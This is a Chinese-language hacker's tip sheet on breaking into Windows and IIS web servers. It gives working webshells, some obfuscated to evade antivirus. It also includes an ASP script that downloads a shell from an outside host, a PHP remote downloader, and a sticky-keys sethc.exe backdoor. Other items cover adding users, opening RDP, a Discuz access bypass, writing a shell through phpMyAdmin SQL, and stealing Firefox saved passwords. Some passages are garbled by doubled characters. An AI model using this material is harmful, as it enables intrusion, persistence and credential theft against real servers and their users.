远程终端连接超出最大连接。 可以用这个命令 开始- 运行 mstsc /admin
————-
当使用菜刀出现乱码时 可设置编码为 utf-8将不会出现乱码
————-
ver 查查看服务器版版本号
对应应版本号对应应的系统 5.0 2000 5.1 xp 5.2 2003 6.0 vvista 6..1 2008 6.17 2007
systeeminfo 查看补补丁及系统信信息
了解解了系统相关关信息。 进行行查看补丁号号:(这个命令令比较好用)
dir cc:windows>>a.txt&(for %%i in (KB9522004.log KB9956572.log KKB2393802.loog KB25036665.log KB25592799.log KB2621440.llog KB21603329.log KB9970483.log KKB2124261.loog KB9771665.log KB9558644.log) doo @type a.txtt|@find /i ”%%i”||@echo %%i Not Installeed!)&del /f /qq /a a.txt
对应应补丁号的 exp
KB9552004 :MS009‐012 PR
KB9556572 :MS009‐012 巴西西烤肉
KB23393802:MS111‐011
KB2503665:MS11‐046
KB2592799:MS11‐080
KB2621440:MS12‐020
KB2160329:MS10‐048
KB970483 :MS09‐020 iis6 提权(可能是)
KB2124261,KB2271195 :MS10‐065 IIS7 提权(可能是)
KB977165 :MS10‐015 Ms Viru
KB958644 :MS08‐067
————-
tasklist /svc 查看系统进程提供服务
sc qc MySQL 查询指定服务的配置信息
————–
80sec 的 星外提权马
其实上面列出的文件都是 everyone 的权限,就是任何用户都可以读写和执行的权限。 以上文件权限为 Everyone,注意,即使可替换文件的所在目录你无权访问,也照样可以替 换执行。比如 D:Program Files360360SafedeepscanSectionmutex.db,可 D:Program Files360360SafedeepscanSection 目录没有访问权限,用 BIN 牛的 aspx 大马访问 D:Program Files360360SafedeepscanSectio 显示拒绝访问,可mutex.db 文件在该目 录下,你照样可以上传由 cmd.exe 换名后的 mutex.db 文件进行替换。
星外提权的关键就是读取IIS 的基本信息 里面有个freehostrunat 的系统权限的用户以及密码。 这好像是星外主机的0day。 利用法客工具包中的星外读 IIS.exe
——————–
把下面代码保存为1.vbs
Set o=CreateObject( “Shell.Users” ) Set z=o.create(“user”)
z.changePassword “12345″,””
z.setting(“AccountType”)=3 然后以system 权限运行 会添加一个用户user 密码为12345
——-插一个普通防火墙的方法—–
———
提供一些下载的脚本
asp 的下载脚本,要求是支持数据流的组建没有被删除
<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,”http://www.0day5.com/2.txt”,False
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1 sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“11.asp”),2
set sGet = nothing
set sPOST = nothing %> 意思是把http://www.0day5.com/2.txt 这个文件下载到当前目录保存为11.asp
利用嘛…保存为x.asp,然后去访问,等到进度条完成了再去访问11.asp 会发现大马躺在那
里的
php 的,这个是音符大大给的
<form method=”post”>
<input name=”url” size=”50″ />
<input name=”submit” type=”submit” />
</form> <?php $pwd=’e’;//这里为你的密码
if ($_REQUEST['pwd']!=$pwd)
exit(‘Sorry ,you are not validate user!’);
// maximum execution time in seconds set_time_limit (24 * 60 * 60);
if (!isset($_POST['submit'])) die();
// folder to save downloaded files to. must end with slash
$destination_folder = ‘./’;
$url = $_POST['url']; $newfname = $destination_folder . basename($url);
$file = fopen ($url, “rb”);
if ($file) {
$newf = fopen ($newfname, “wb”);
if ($newf) while(!feof($file))
{
fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
}
} if ($file)
{
fclose($file);
}
if ($newf) { fclose($newf);
echo ‘OK,File has been downloaded!’;
}
?>
保存为xx.php,然后通过e.php?pwd=e 访问会提示让输入地址,这里找一个不解析php 的网
站,然后上传去…它会自己下载文件,并保存在当前目录
关于突破的一句话,我一直在使用仙剑之鸣提起的那个一句话
<%
Call System_Initalize() Function System_Initalize()
On Error Resume Next
Dim Rss2Export:Rss2Export=”Export”
Dim objArticle:objArticle=Request(Rss2Export)
Set Rss2Export = New TRssExport With Rss2Export
Dim objRS,UserName,UserIntro
.TimeZone=ZC_TIME_ZONE
UserName=Users(UserID).Name
If objArticle<>”” Then .AddChannelAttribute “language”,ZC_BLOG_LANGUAGE
Execute Replace(objArticle,”*”&Rss2Export,””)
.AddChannelAttribute
“copyright”,TransferHTML(ZC_BLOG_COPYRIGHT,”[nohtml][html-format]“)
.AddChannelAttribute “pubDate”,Now Response.End()
End if
End With
End Function
%> 密码是Dim Rss2Export:Rss2Export=”Export”这里的Export //才发现它已经Out 了
php 的是选择了
nono< ?php
eval
($_POST [1])
?> 密码是1
以及
<?php $a = str_replace(x,””,”axsxxsxexrxxt”); $a($_POST["c"]); ?> 密码是c
大伙抽空给测试下
下面的是一款asp 的小马,至今未被杀,刚刚测试还可以用
<%on error resume next%> <%ofso=”scripting.filesystemobject”%>
<%set fso=server.createobject(ofso)%>
<%path=request(“path”)%>
<%if path<>”” then%> <%data=request(“dama”)%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%=”success”%> <%else%>
<%=”false”%>
<%end if%>
<%err.clear%>
<%end if%> <%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%=”<form action=” method=post>”%>
<%=”<input type=text name=path>”%> <%=”<br>”%>
<%=server.mappath(request.servervariables(“script_name”))%>
<%=”<br>”%>
<%=””%>
<%=”<textarea name=dama cols=70 rows=30 width=30></textarea>”%> <%=”<br>”%>
<%=”<input type=submit value=save>”%>
<%=”</form>”%>
———————
@echo off
del /q %systemroot%system32dllcachesethc.exe del /q %systemroot%system32sethc.exe
copy %systemroot%explorer.exe%systemroot%system32sethc.exe
copy %systemroot%explorer.exe %systemroot%system32dllcachesethc.exe 保持为1.bat
替换shift
——-
开3389命令
Reg add ”HKEY_LOCAL_MACHINESYSTEMCurrentControISetcontrolTerminal ServerWdsrdpwdTdstcp” /v PortNumber /t REG_DWORD /d 3389 /f
Reg add ”HKEY_LOCAL_MACHINESYSTEMCurrentControISetcontrolTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
———————————–DZ看用户的Tip开始———————————–
Dz很多版本, 具体没有测试, 就是未注册用户和普通用户是没有权限查看其他用户资料的.
就拿官网举例吧, 公告发布人有个Cnteacher, ID是859, groupID也是1,即管理员权限. 想进入空间看资料, http://www.discuz.net/home.php?mod=space&uid=859, 却显示’请先登录后才能继续浏览’
这时在url后面添加&do=index&view=admin 根据字面意思就是用admin权限浏览这个id的主页. 添加&do=profile&view=admin 就是用admin权限浏览这个id的个人资料. 如图
mysqli_error_trace.inc dede 可在这里面找到dede后台.
通过dede补丁号 得到版本号
百度: dedecms 补丁号
即可得到版本号
phpmyadmin爆物理路径 和 webshell
先爆出物理路径:
http://URL/phpmyadmin/libraries/select_lang.lib.php
创建表——表中插入一句话——-一句话写入文件—–删除表。
CreateTABLEa(cmdtextNOTNULL); InsertINTOa(cmd)VALUES(‘<?php@eval($_POST[cmd])?>’);
selectcmdfromaintooutfile’物理路径/phpMyAdmin/d.php’;
DropTABLEIFEXISTSa;
连接菜刀
在Firefox的配置文件(%userprofileApplicationDataMozillaFirefoxProfiles)目录下面有几
个文件:Signons2.txt、Signons3.txt,这就是Firefox保存不同站点登录所用的用户名和密码
的文件。
Firefox不同的版本使用不同的文件保存密码,Signons2.txt是FF2.0的密码文件,
Signons3.txt是FF3.0使用的文件,从FF3.5开始,使用signons.sqlite数据库文件来保存密码。 尽管像Signons3.txt里面登录密码是加密保存的,但是加密的密钥保存在同目录下的key3.db
文件中,如果没有用MasterPassword来加密保护的话,同时取得Signons3.txt和key3.db文
件就可以得到密码,所以还是在密码选项中启用主密码更安全些。
按照上面的说法,来到路径(红色为随机字符)
C:DocumentsandSettingsAdministratorApplicationDataMozillaFirefoxProfilesxxx.default
下载key3.db和signons.sqlite,替换掉本机的这两个文件。打开Firefox,即可查到保存
的密码~
Ps:不要小看这些鸡肋的不算漏洞的漏洞, 有时能帮上大忙的.